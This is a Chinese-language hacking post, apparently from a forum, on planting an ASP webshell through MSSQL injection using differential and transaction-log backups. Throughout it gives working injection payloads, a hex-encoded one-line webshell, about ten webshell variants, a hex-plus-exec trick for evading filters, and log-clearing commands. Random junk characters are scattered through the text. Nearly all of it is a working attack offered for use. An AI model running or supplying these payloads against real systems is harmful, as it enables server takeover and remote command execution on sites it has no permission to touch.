MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
, m  D$ t/ a! w+ [; Dbackup database 库名 to disk = 'c:\ddd.bak';--
) B9 j2 N1 H3 h
  X) P% U# H# k1 S' }: b2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
' i4 t' B1 B  J% M3 ~4 b, k: U1 z( n
) [$ O/ q% l6 Q3.进行差异备份
; S6 u* r5 N' _$ gbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
4 p6 l! P2 `5 b. H1 f: ]* s6 N4 _  y
上面
" t$ |- Y5 H. P0x3C25657865637574652872657175657374282261222929253E
8 c- \  N  L8 e! w) {: W就是一句话木马的内容：<%execute(request("a"))%>
7 l, w4 O4 r( i  z7 v
如下是网上常见的差异备份代码，思路一样！
& D: Y5 r! U3 e* V& A$ @6 y===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

  c& ?/ v5 f3 `6 qdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
* Y* j" |$ Y- k7 T; t6 X
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

+ m/ T% x: D( l1 B7 u% C& B" Q
3 K! [8 x: c: ]% M- [2 l9 x% z: l; ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

4 j7 S( O1 v7 p* Fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。
7 M3 L3 k& Q  Y! K
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
6 U3 S! w' a, R/ _  w4 r1 ]: A6 o$ ?0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
1 O+ W4 J2 g3 d, |+ y
. f( ]/ y* c( [* {6 v0 F. J: P声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
& h% y2 D- x6 V. ~===============================================================
$ }0 K2 z0 c9 ^+ r) w
- E# R7 p+ m7 {% x我发现上面代码，有时会无效，而直接用

- p4 p5 S% D+ abackup database 库名 to disk = 'c:\ddd.bak'
7 f3 a# Q& e- T
: O: i" d4 N" H& \% R7 L% d3 G) Ycreate table [dbo].[dtest] ([cmd] [image]);
( g; f0 ?5 n6 o& x" f! k5 m
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

) a, b9 g" K, {! z7 ?8 m5 Kbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
0 N3 d$ z) w6 q" p
3 z3 `. _( x- s: G却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
" w. I1 b: g% n1 d1 K
7 l! ^- |& p8 a; j库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
% o1 B) E& Z) Q; M% g! S9 k- A=====================================================
另一种log增量备份技术:
* p7 F+ C  |$ {, d" U3 S
/ ^: t* e. H% Y';alter database null set RECOVERY FULL--

- J- n) {. N% n  _';create table cmd (a image)--
. L7 ]$ C; Q2 w" ^" ^
';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* M: k- F5 y' d3 v
" q8 t/ P% n$ E+ D5 q) S';backup log null to disk = '备份路径'--

# _9 l' B+ s& h7 W';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--
/ {) G1 ^$ C# ^6 o
1 q. t$ x# d! Z2 L; }% M$ [PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
# p8 M! V" I+ n
说到一句话马，还可以有这么几种写法：

( O* C" D" [& ^& B4 {" Ea)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
0 D1 I: n) y; [9 Z% }2 \c)%><%execute request("a")%><%
* @7 d4 k5 j% m! {8 v$ vd)<script language=VBScript runat=server>execute request("a")</script>
4 D' ]. c; S1 b) xe)<%25Execute(request("a"))%25>
* q/ V+ ^1 N( M3 C$ M7 D4 Yf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
, P4 h" q2 J! t- O7 a  V0 ~+ lh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
% Z; U" N# N+ _* j2 I
+ D9 \& \3 w; g1 n% p; b# w=============================================

当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

9 z) N, m& d3 H把要执行的语句转16进制然后用exec执行
1 W1 g: X. D; ~7 j* N5 T6 D: O

: y2 h! ^% i+ }减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
7 l- Q9 p: ^% M( E2 Q- ^' o+ Fid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
' I1 k2 `: d- O2
id=1;backup database model to disk='你的路径‘ with differential,format;--
0 o; t3 N/ Q. O, K
. y+ K/ s# Z8 e" \- b

SQL语句清理日志
注：test为数据库名

--清空日志
& o- p4 W+ Y7 e4 `4 o" O% FDUMP TRANSACTION test WITH NO_LOG

--截断事务日志
BACKUP LOG test WITH NO_LOG
. K4 ^* N* x  Z6 y, q
--收缩数据库
% V3 e8 @$ u( S# K0 T* {% ?DBCC SHRINKDATABASE(test)
9 `7 {& p- u) b! q8 C. a; k1 j, }+ ^
3 A( i6 g( W1 q--收缩指定数据文件,1是文件号,可以通过这个语句查询到
3 N* b1 r* c7 z2 nSelect * from sysfiles DBCC SHRINKFILE(1)
* I: D  E$ m9 r9 n0 w
--以后能自动收缩
) \+ A$ S% E/ M4 T2 {' G' JEXEC sp_dboption 'test', 'autoshrink', 'TRUE'